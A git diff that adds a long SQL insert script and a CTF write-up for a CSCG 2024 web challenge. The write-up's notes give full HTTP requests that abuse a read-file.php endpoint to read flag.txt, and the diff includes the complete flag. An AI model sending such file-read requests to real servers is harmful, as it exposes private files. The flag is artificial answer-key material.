+INSERT INTO LOB_IDS VALUES(681,466,1,40) +INSERT INTO LOB_IDS VALUES(682,533,1,40) +INSERT INTO LOB_IDS VALUES(683,530,1,40) +INSERT INTO LOB_IDS VALUES(684,49,1,40) +INSERT INTO LOB_IDS VALUES(685,588,1,40) +INSERT INTO LOB_IDS VALUES(686,354,1,40) +INSERT INTO LOB_IDS VALUES(687,623,1,40) +INSERT INTO LOB_IDS VALUES(688,678,1,40) +INSERT INTO LOB_IDS VALUES(689,297,1,40) +INSERT INTO LOB_IDS VALUES(690,317,1,40) +INSERT INTO LOB_IDS VALUES(691,559,1,40) +INSERT INTO LOB_IDS VALUES(692,524,1,40) +INSERT INTO LOB_IDS VALUES(693,317,1,40) +INSERT INTO LOB_IDS VALUES(694,313,1,40) +INSERT INTO LOB_IDS VALUES(695,551,1,40) +INSERT INTO LOB_IDS VALUES(696,308,1,40) +INSERT INTO LOB_IDS VALUES(697,542,1,40) +INSERT INTO LOB_IDS VALUES(698,557,1,40) +INSERT INTO LOB_IDS VALUES(699,678,1,40) +INSERT INTO LOB_IDS VALUES(700,539,1,40) +INSERT INTO LOB_IDS VALUES(701,560,1,40) +INSERT INTO LOB_IDS VALUES(702,552,1,40) +INSERT INTO LOB_IDS VALUES(703,546,1,40) +INSERT INTO LOB_IDS VALUES(704,558,1,40) +INSERT INTO LOB_IDS VALUES(705,608,1,40) +INSERT INTO LOB_IDS VALUES(706,563,1,40) +INSERT INTO LOB_IDS VALUES(707,544,1,40) +INSERT INTO LOB_IDS VALUES(708,563,1,40) +INSERT INTO LOB_IDS VALUES(709,542,1,40) +INSERT INTO LOB_IDS VALUES(710,563,1,40) +INSERT INTO LOB_IDS VALUES(711,589,1,40) +INSERT INTO LOB_IDS VALUES(712,563,1,40) +INSERT INTO LOB_IDS VALUES(713,563,1,40) +INSERT INTO LOB_IDS VALUES(714,536,1,40) +INSERT INTO LOB_IDS VALUES(715,544,1,40) +INSERT INTO LOB_IDS VALUES(716,539,1,40) +INSERT INTO LOB_IDS VALUES(717,641,1,40) +INSERT INTO LOB_IDS VALUES(718,542,1,40) +INSERT INTO LOB_IDS VALUES(719,539,1,40) +INSERT INTO LOB_IDS VALUES(720,536,1,40) +INSERT INTO LOB_IDS VALUES(721,544,1,40) +INSERT INTO LOB_IDS VALUES(722,544,1,40) +INSERT INTO LOB_IDS VALUES(723,544,1,40) +INSERT INTO LOB_IDS VALUES(724,563,1,40) +INSERT INTO LOB_IDS VALUES(725,638,1,40) +INSERT INTO LOB_IDS VALUES(726,544,1,40) +INSERT INTO LOB_IDS VALUES(727,563,1,40) +INSERT INTO LOB_IDS VALUES(728,544,1,40) +INSERT INTO LOB_IDS VALUES(729,544,1,40) +INSERT INTO LOB_IDS VALUES(730,563,1,40) +INSERT INTO LOB_IDS VALUES(731,542,1,40) +INSERT INTO LOB_IDS VALUES(732,539,1,40) +INSERT INTO LOB_IDS VALUES(733,641,1,40) +INSERT INTO LOB_IDS VALUES(734,563,1,40) +INSERT INTO LOB_IDS VALUES(735,539,1,40) +INSERT INTO LOB_IDS VALUES(736,536,1,40) +INSERT INTO LOB_IDS VALUES(737,678,1,40) +INSERT INTO LOB_IDS VALUES(738,563,1,40) +INSERT INTO LOB_IDS VALUES(739,544,1,40) +INSERT INTO LOB_IDS VALUES(740,536,1,40) +INSERT INTO LOB_IDS VALUES(741,542,1,40) +INSERT INTO LOB_IDS VALUES(742,544,1,40) +INSERT INTO LOB_IDS VALUES(743,542,1,40) +INSERT INTO LOB_IDS VALUES(744,536,1,40) +INSERT INTO LOB_IDS VALUES(745,678,1,40) +INSERT INTO LOB_IDS VALUES(746,641,1,40) +INSERT INTO LOB_IDS VALUES(747,641,1,40) +INSERT INTO LOB_IDS VALUES(748,678,1,40) +INSERT INTO LOB_IDS VALUES(749,678,1,40) +INSERT INTO LOB_IDS VALUES(750,593,1,40) +INSERT INTO LOB_IDS VALUES(751,594,1,40) +INSERT INTO LOB_IDS VALUES(752,679,1,40) +INSERT INTO LOB_IDS VALUES(753,619,1,40) +INSERT INTO LOB_IDS VALUES(754,678,1,40) +INSERT INTO LOB_IDS VALUES(755,628,1,40) +INSERT INTO LOB_IDS VALUES(756,636,1,40) +INSERT INTO LOB_IDS VALUES(757,621,1,40) +INSERT INTO LOB_IDS VALUES(758,678,1,40) +INSERT INTO LOB_IDS VALUES(759,676,1,40) +INSERT INTO LOB_IDS VALUES(760,678,1,40) +INSERT INTO LOB_IDS VALUES(761,678,1,40) +INSERT INTO LOB_IDS VALUES(762,624,1,40) +INSERT INTO LOB_IDS VALUES(763,678,1,40) +INSERT INTO LOB_IDS VALUES(764,630,1,40) +INSERT INTO LOB_IDS VALUES(765,678,1,40) +INSERT INTO LOB_IDS VALUES(766,678,1,40) +INSERT INTO LOB_IDS VALUES(767,678,1,40) +INSERT INTO LOB_IDS VALUES(768,587,1,40) +INSERT INTO LOB_IDS VALUES(769,671,1,40) +INSERT INTO LOB_IDS VALUES(770,598,1,40) +INSERT INTO LOB_IDS VALUES(771,675,1,40) +INSERT INTO LOB_IDS VALUES(772,679,1,40) +INSERT INTO LOB_IDS VALUES(773,619,1,40) +INSERT INTO LOB_IDS VALUES(774,588,1,40) +INSERT INTO LOB_IDS VALUES(775,678,1,40) +INSERT INTO LOB_IDS VALUES(776,678,1,40) +INSERT INTO LOB_IDS VALUES(777,590,1,40) +INSERT INTO LOB_IDS VALUES(778,587,1,40) +INSERT INTO LOB_IDS VALUES(779,587,1,40) +INSERT INTO LOB_IDS VALUES(780,678,1,40) +INSERT INTO LOB_IDS VALUES(781,630,1,40) +INSERT INTO LOB_IDS VALUES(782,636,1,40) +INSERT INTO LOB_IDS VALUES(783,639,1,40) +INSERT INTO LOB_IDS VALUES(784,678,1,40) +INSERT INTO LOB_IDS VALUES(785,678,1,40) +INSERT INTO LOB_IDS VALUES(786,678,1,40) +INSERT INTO LOB_IDS VALUES(787,646,1,40) +INSERT INTO LOB_IDS VALUES(788,644,1,40) +INSERT INTO LOB_IDS VALUES(789,629,1,40) +INSERT INTO LOB_IDS VALUES(790,644,1,40) +INSERT INTO LOB_IDS VALUES(791,660,1,40) +INSERT INTO LOB_IDS VALUES(792,678,1,40) +INSERT INTO LOB_IDS VALUES(793,678,1,40) +INSERT INTO LOB_IDS VALUES(794,640,1,40) +INSERT INTO LOB_IDS VALUES(795,678,1,40) +INSERT INTO LOB_IDS VALUES(796,678,1,40) +INSERT INTO LOB_IDS VALUES(797,616,1,40) +INSERT INTO LOB_IDS VALUES(798,604,1,40) +INSERT INTO LOB_IDS VALUES(799,618,1,40) +INSERT INTO LOB_IDS VALUES(800,678,1,40) +INSERT INTO LOB_IDS VALUES(801,678,1,40) +INSERT INTO LOB_IDS VALUES(802,593,1,40) +INSERT INTO LOB_IDS VALUES(803,678,1,40) +INSERT INTO LOB_IDS VALUES(804,603,1,40) +INSERT INTO LOB_IDS VALUES(805,678,1,40) +INSERT INTO LOB_IDS VALUES(806,678,1,40) +INSERT INTO LOB_IDS VALUES(807,678,1,40) +INSERT INTO LOB_IDS VALUES(808,593,1,40) +INSERT INTO LOB_IDS VALUES(809,505,1,40) +INSERT INTO LOB_IDS VALUES(810,529,1,40) +INSERT INTO LOB_IDS VALUES(811,510,1,40) +INSERT INTO LOB_IDS VALUES(812,502,1,40) +INSERT INTO LOB_IDS VALUES(813,534,1,40) +INSERT INTO LOB_IDS VALUES(814,103,1,40) +INSERT INTO LOB_IDS VALUES(815,42,1,40) +INSERT INTO LOB_IDS VALUES(816,64,1,40) +INSERT INTO LOB_IDS VALUES(817,64,1,40) +INSERT INTO LOB_IDS VALUES(818,64,1,40) +INSERT INTO LOB_IDS VALUES(819,120,1,40) +INSERT INTO LOB_IDS VALUES(820,80032,1,40) +INSERT INTO LOB_IDS VALUES(821,64,1,40) +INSERT INTO LOB_IDS VALUES(822,64,1,40) +INSERT INTO LOB_IDS VALUES(823,1,1,40) +INSERT INTO LOB_IDS VALUES(824,297,1,40) +INSERT INTO LOB_IDS VALUES(825,1,1,40) +INSERT INTO LOB_IDS VALUES(826,298,1,40) +INSERT INTO LOB_IDS VALUES(827,64,1,40) +INSERT INTO LOB_IDS VALUES(828,1764,1,40) +INSERT INTO LOB_IDS VALUES(829,1767,1,40) +INSERT INTO LOB_IDS VALUES(830,64,1,40) +INSERT INTO LOB_IDS VALUES(831,1646,1,40) +INSERT INTO LOB_IDS VALUES(832,42,1,40) +INSERT INTO LOB_IDS VALUES(833,74,1,40) +INSERT INTO LOB_IDS VALUES(834,42,1,40) +INSERT INTO LOB_IDS VALUES(835,122,1,40) +INSERT INTO LOB_IDS VALUES(836,316,1,40) +INSERT INTO LOB_IDS VALUES(837,553,1,40) +INSERT INTO LOB_IDS VALUES(838,522,1,40) +INSERT INTO LOB_IDS VALUES(839,554,1,40) +INSERT INTO LOB_IDS VALUES(840,323,1,40) +INSERT INTO LOB_IDS VALUES(841,327,1,40) +INSERT INTO LOB_IDS VALUES(842,571,1,40) +INSERT INTO LOB_IDS VALUES(843,579,1,40) +INSERT INTO LOB_IDS VALUES(844,580,1,40) +INSERT INTO LOB_IDS VALUES(845,572,1,40) +INSERT INTO LOB_IDS VALUES(846,560,1,40) +INSERT INTO LOB_IDS VALUES(847,560,1,40) +INSERT INTO LOB_IDS VALUES(848,558,1,40) +INSERT INTO LOB_IDS VALUES(849,552,1,40) +INSERT INTO LOB_IDS VALUES(850,555,1,40) +INSERT INTO LOB_IDS VALUES(851,579,1,40) +INSERT INTO LOB_IDS VALUES(852,579,1,40) +INSERT INTO LOB_IDS VALUES(853,305,1,40) +INSERT INTO LOB_IDS VALUES(854,533,1,40) +INSERT INTO LOB_IDS VALUES(855,502,1,40) +INSERT INTO LOB_IDS VALUES(856,534,1,40) +INSERT INTO LOB_IDS VALUES(857,314,1,40) +INSERT INTO LOB_IDS VALUES(858,315,1,40) +INSERT INTO LOB_IDS VALUES(859,558,1,40) +INSERT INTO LOB_IDS VALUES(860,560,1,40) +INSERT INTO LOB_IDS VALUES(861,562,1,40) +INSERT INTO LOB_IDS VALUES(862,311,1,40) +INSERT INTO LOB_IDS VALUES(863,552,1,40) +INSERT INTO LOB_IDS VALUES(864,547,1,40) +INSERT INTO LOB_IDS VALUES(865,554,1,40) +INSERT INTO LOB_IDS VALUES(866,532,1,40) +INSERT INTO LOB_IDS VALUES(867,552,1,40) +INSERT INTO LOB_IDS VALUES(868,552,1,40) +INSERT INTO LOB_IDS VALUES(869,544,1,40) +INSERT INTO LOB_IDS VALUES(870,532,1,40) +INSERT INTO LOB_IDS VALUES(871,554,1,40) +INSERT INTO LOB_IDS VALUES(872,552,1,40) +INSERT INTO LOB_IDS VALUES(873,554,1,40) +INSERT INTO LOB_IDS VALUES(874,547,1,40) +INSERT INTO LOB_IDS VALUES(875,552,1,40) +INSERT INTO LOB_IDS VALUES(876,544,1,40) +INSERT INTO LOB_IDS VALUES(877,64,1,40) +INSERT INTO LOB_IDS VALUES(878,64,1,40) +INSERT INTO LOB_IDS VALUES(879,309,1,40) +INSERT INTO LOB_IDS VALUES(880,541,1,40) +INSERT INTO LOB_IDS VALUES(881,510,1,40) +INSERT INTO LOB_IDS VALUES(882,542,1,40) +INSERT INTO LOB_IDS VALUES(883,317,1,40) +INSERT INTO LOB_IDS VALUES(884,321,1,40) +INSERT INTO LOB_IDS VALUES(885,567,1,40) +INSERT INTO LOB_IDS VALUES(886,559,1,40) +INSERT INTO LOB_IDS VALUES(887,321,1,40) +INSERT INTO LOB_IDS VALUES(888,568,1,40) +INSERT INTO LOB_IDS VALUES(889,560,1,40) +INSERT INTO LOB_IDS VALUES(890,577,1,40) +INSERT INTO LOB_IDS VALUES(891,577,1,40) +INSERT INTO LOB_IDS VALUES(892,565,1,40) +INSERT INTO LOB_IDS VALUES(893,553,1,40) +INSERT INTO LOB_IDS VALUES(894,558,1,40) +INSERT INTO LOB_IDS VALUES(895,566,1,40) +INSERT INTO LOB_IDS VALUES(896,550,1,40) +INSERT INTO LOB_IDS VALUES(897,550,1,40) +INSERT INTO LOB_IDS VALUES(898,558,1,40) +INSERT INTO LOB_IDS VALUES(899,577,1,40) +INSERT INTO LOB_IDS VALUES(900,556,1,40) +INSERT INTO LOB_IDS VALUES(901,577,1,40) +INSERT INTO LOB_IDS VALUES(902,558,1,40) +INSERT INTO LOB_IDS VALUES(903,556,1,40) +INSERT INTO LOB_IDS VALUES(904,558,1,40) +INSERT INTO LOB_IDS VALUES(905,553,1,40) +INSERT INTO LOB_IDS VALUES(906,321,1,40) +INSERT INTO LOB_IDS VALUES(907,565,1,40) +INSERT INTO LOB_IDS VALUES(908,534,1,40) +INSERT INTO LOB_IDS VALUES(909,566,1,40) +INSERT INTO LOB_IDS VALUES(910,329,1,40) +INSERT INTO LOB_IDS VALUES(911,333,1,40) +INSERT INTO LOB_IDS VALUES(912,583,1,40) +INSERT INTO LOB_IDS VALUES(913,591,1,40) +INSERT INTO LOB_IDS VALUES(914,333,1,40) +INSERT INTO LOB_IDS VALUES(915,584,1,40) +INSERT INTO LOB_IDS VALUES(916,592,1,40) +INSERT INTO LOB_IDS VALUES(917,589,1,40) +INSERT INTO LOB_IDS VALUES(918,590,1,40) +INSERT INTO LOB_IDS VALUES(919,566,1,40) +INSERT INTO LOB_IDS VALUES(920,561,1,40) +INSERT INTO LOB_IDS VALUES(921,564,1,40) +INSERT INTO LOB_IDS VALUES(922,585,1,40) +INSERT INTO LOB_IDS VALUES(923,585,1,40) +INSERT INTO LOB_IDS VALUES(924,558,1,40) +INSERT INTO LOB_IDS VALUES(925,566,1,40) +INSERT INTO LOB_IDS VALUES(926,330,1,40) +INSERT INTO LOB_IDS VALUES(927,583,1,40) +INSERT INTO LOB_IDS VALUES(928,552,1,40) +INSERT INTO LOB_IDS VALUES(929,584,1,40) +INSERT INTO LOB_IDS VALUES(930,338,1,40) +INSERT INTO LOB_IDS VALUES(931,342,1,40) +INSERT INTO LOB_IDS VALUES(932,601,1,40) +INSERT INTO LOB_IDS VALUES(933,609,1,40) +INSERT INTO LOB_IDS VALUES(934,610,1,40) +INSERT INTO LOB_IDS VALUES(935,602,1,40) +INSERT INTO LOB_IDS VALUES(936,592,1,40) +INSERT INTO LOB_IDS VALUES(937,587,1,40) +INSERT INTO LOB_IDS VALUES(938,592,1,40) +INSERT INTO LOB_IDS VALUES(939,584,1,40) +INSERT INTO LOB_IDS VALUES(940,611,1,40) +INSERT INTO LOB_IDS VALUES(941,611,1,40) +INSERT INTO LOB_IDS VALUES(942,590,1,40) +INSERT INTO LOB_IDS VALUES(943,64,1,40) +INSERT INTO LOB_IDS VALUES(944,346,1,40) +INSERT INTO LOB_IDS VALUES(945,613,1,40) +INSERT INTO LOB_IDS VALUES(946,582,1,40) +INSERT INTO LOB_IDS VALUES(947,614,1,40) +INSERT INTO LOB_IDS VALUES(948,353,1,40) +INSERT INTO LOB_IDS VALUES(949,357,1,40) +INSERT INTO LOB_IDS VALUES(950,639,1,40) +INSERT INTO LOB_IDS VALUES(951,631,1,40) +INSERT INTO LOB_IDS VALUES(952,632,1,40) +INSERT INTO LOB_IDS VALUES(953,640,1,40) +INSERT INTO LOB_IDS VALUES(954,616,1,40) +INSERT INTO LOB_IDS VALUES(955,613,1,40) +INSERT INTO LOB_IDS VALUES(956,618,1,40) +INSERT INTO LOB_IDS VALUES(957,610,1,40) +INSERT INTO LOB_IDS VALUES(958,637,1,40) +INSERT INTO LOB_IDS VALUES(959,618,1,40) +INSERT INTO LOB_IDS VALUES(960,637,1,40) +INSERT INTO LOB_IDS VALUES(961,64,1,40) +INSERT INTO LOB_IDS VALUES(962,158,1,40) +INSERT INTO LOB_IDS VALUES(963,4,1,40) +INSERT INTO LOB_IDS VALUES(964,458,1,40) +INSERT INTO LOB_IDS VALUES(965,307,1,40) +INSERT INTO LOB_IDS VALUES(966,49,1,40) +INSERT INTO LOB_IDS VALUES(967,4,1,40) +INSERT INTO LOB_IDS VALUES(968,354,1,40) +INSERT INTO LOB_IDS VALUES(969,308,1,40) +INSERT INTO LOB_IDS VALUES(970,216,1,40) +INSERT INTO LOB_IDS VALUES(971,215,1,40) +INSERT INTO LOB_IDS VALUES(972,4,1,40) +INSERT INTO LOB_IDS VALUES(973,197,1,40) +INSERT INTO LOB_IDS VALUES(974,61,1,40) +INSERT INTO LOB_IDS VALUES(975,77,1,40) +INSERT INTO LOB_IDS VALUES(976,49,1,40) +INSERT INTO LOB_IDS VALUES(977,190,1,40) +INSERT INTO LOB_IDS VALUES(978,2042,1,40) +INSERT INTO LOB_IDS VALUES(979,176,1,40) +INSERT INTO LOB_IDS VALUES(980,4300,1,40) +INSERT INTO LOB_IDS VALUES(981,190,1,40) +INSERT INTO LOB_IDS VALUES(982,2042,1,40) +INSERT INTO LOB_IDS VALUES(983,176,1,40) +INSERT INTO LOB_IDS VALUES(984,4300,1,40) +INSERT INTO LOB_IDS VALUES(985,4,1,40) +INSERT INTO LOB_IDS VALUES(986,61,1,40) +INSERT INTO LOB_IDS VALUES(987,77,1,40) +INSERT INTO LOB_IDS VALUES(988,49,1,40) +INSERT INTO LOB_IDS VALUES(989,219,1,40) +INSERT INTO LOB_IDS VALUES(990,103,1,40) +INSERT INTO LOB_IDS VALUES(991,176,1,40) +INSERT INTO LOB_IDS VALUES(992,6059,1,40) +INSERT INTO LOB_IDS VALUES(993,64,1,40) +INSERT INTO LOB_IDS VALUES(994,64,1,40) +INSERT INTO LOB_IDS VALUES(995,64,1,40) +INSERT INTO LOB_IDS VALUES(996,216,1,40) +INSERT INTO LOB_IDS VALUES(997,103,1,40) +INSERT INTO LOB_IDS VALUES(998,176,1,40) +INSERT INTO LOB_IDS VALUES(999,7797,1,40) +INSERT INTO LOB_IDS VALUES(1000,64,1,40) +INSERT INTO LOB_IDS VALUES(1001,4,1,40) +INSERT INTO LOB_IDS VALUES(1002,0,1,40) +INSERT INTO LOB_IDS VALUES(1003,0,1,40) +INSERT INTO LOB_IDS VALUES(1004,61,1,40) +INSERT INTO LOB_IDS VALUES(1005,77,1,40) +INSERT INTO LOB_IDS VALUES(1006,49,1,40) +INSERT INTO LOB_IDS VALUES(1007,224,1,40) +INSERT INTO LOB_IDS VALUES(1008,103,1,40) +INSERT INTO LOB_IDS VALUES(1009,176,1,40) +INSERT INTO LOB_IDS VALUES(1010,11772,1,40) +INSERT INTO LOB_IDS VALUES(1011,64,1,40) +INSERT INTO LOB_IDS VALUES(1012,0,1,40) +INSERT INTO LOB_IDS VALUES(1013,0,1,40) +INSERT INTO LOB_IDS VALUES(1014,64,1,40) +INSERT INTO LOB_IDS VALUES(1015,64,1,40) +INSERT INTO LOB_IDS VALUES(1016,64,1,40) +INSERT INTO LOB_IDS VALUES(1017,64,1,40) +INSERT INTO LOB_IDS VALUES(1018,64,1,40) +INSERT INTO LOB_IDS VALUES(1019,0,1,40) +INSERT INTO LOB_IDS VALUES(1020,0,1,40) +INSERT INTO LOB_IDS VALUES(1021,4,1,40) +INSERT INTO LOB_IDS VALUES(1022,0,1,40) +INSERT INTO LOB_IDS VALUES(1023,0,1,40) +INSERT INTO LOB_IDS VALUES(1024,0,1,40) +INSERT INTO LOB_IDS VALUES(1025,0,1,40) +INSERT INTO LOB_IDS VALUES(1026,0,1,40) +INSERT INTO LOB_IDS VALUES(1027,0,1,40) +INSERT INTO LOB_IDS VALUES(1028,0,1,40) +INSERT INTO LOB_IDS VALUES(1029,0,1,40) +INSERT INTO LOB_IDS VALUES(1030,0,1,40) +INSERT INTO LOB_IDS VALUES(1031,0,1,40) +INSERT INTO LOB_IDS VALUES(1032,0,1,40) +INSERT INTO LOB_IDS VALUES(1033,0,1,40) +INSERT INTO LOB_IDS VALUES(1034,0,1,40) +INSERT INTO LOB_IDS VALUES(1035,0,1,40) +INSERT INTO LOB_IDS VALUES(1036,0,1,40) +INSERT INTO LOB_IDS VALUES(1037,0,1,40) +INSERT INTO LOB_IDS VALUES(1038,0,1,40) +INSERT INTO LOB_IDS VALUES(1039,0,1,40) diff --git a/cscg24/web/intro_web_2/leaked_sites/burn_after_reading.html b/cscg24/web/intro_web_2/leaked_sites/burn_after_reading.html new file mode 100644 index 0000000..6bf9bdc --- /dev/null +++ b/cscg24/web/intro_web_2/leaked_sites/burn_after_reading.html @@ -0,0 +1,19 @@ + + + Intro to Web 2 + + + + +

Burn After Reading

+This page automatically retrieves confidential information. +To protect against unauthorized use, the backend server will irreversibly nuke all of our data in +case this page is accessed by someone that failed to pass our +Military-Grade Security Gate™. +

Status of flag document: +INTACT

+
+
+Flag part 4/4: W4at6R2B}
+ + diff --git a/cscg24/web/intro_web_2/leaked_sites/statistics_console.html b/cscg24/web/intro_web_2/leaked_sites/statistics_console.html new file mode 100644 index 0000000..b05a820 --- /dev/null +++ b/cscg24/web/intro_web_2/leaked_sites/statistics_console.html @@ -0,0 +1,16 @@ + + + Intro to Web 2 + + + + +

Statistics Console (POST version)

+

File Name: +flag.txt

+
+
+Flag part 2/4: UaT0BVvk
+ + + diff --git a/cscg24/web/intro_web_2/leaked_sites/statistics_console_get.html b/cscg24/web/intro_web_2/leaked_sites/statistics_console_get.html new file mode 100644 index 0000000..f6a4135 --- /dev/null +++ b/cscg24/web/intro_web_2/leaked_sites/statistics_console_get.html @@ -0,0 +1,16 @@ + + + Intro to Web 2 + + + + +

Statistics Console (GET version)

+

File Name: +flag.txt

+
+
+Flag part 3/4: Q9Z39J9A
+ + + diff --git a/cscg24/web/intro_web_2/notes.md b/cscg24/web/intro_web_2/notes.md index a2674bb..f5f0e60 100644 --- a/cscg24/web/intro_web_2/notes.md +++ b/cscg24/web/intro_web_2/notes.md @@ -1,2 +1,57 @@ ### 1.Part We can spoof our OS with the help of ZAP and get the site [train.html](leaked_sites/train.html) +### 2. Part +There is an unsecure statistics service which shows you the content of every file you specify. We can use this to get the content of flag.txt. +Sending the following request: + +```http +POST https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php HTTP/1.1 +host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Content-Type: application/x-www-form-urlencoded +content-length: 17 +Origin: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337 +Connection: keep-alive +Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/ +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +filename=flag.txt +``` + +Yields the page [statistics_console.html](leaked_sites/statistics_console.html) + +### 3. Part + +A similar bug can be used with a GET request to get the content of the flag.txt file. +This time we use a faulty php file called read-file.php + +```http +GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php?filename=flag.txt HTTP/1.1 +host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Connection: keep-alive +Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/ +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +content-length: 0 +``` + +Returns the page [statistics_console_get.html](leaked_sites/statistics_console_get.html) + +### 4.Part +We now have to intercept a request made and change the authority information. +When we do this we get the fourth part of the flag. + +### flag +CSCG{l9jj550KUaT0BVvkQ9Z39J9AW4at6R2B}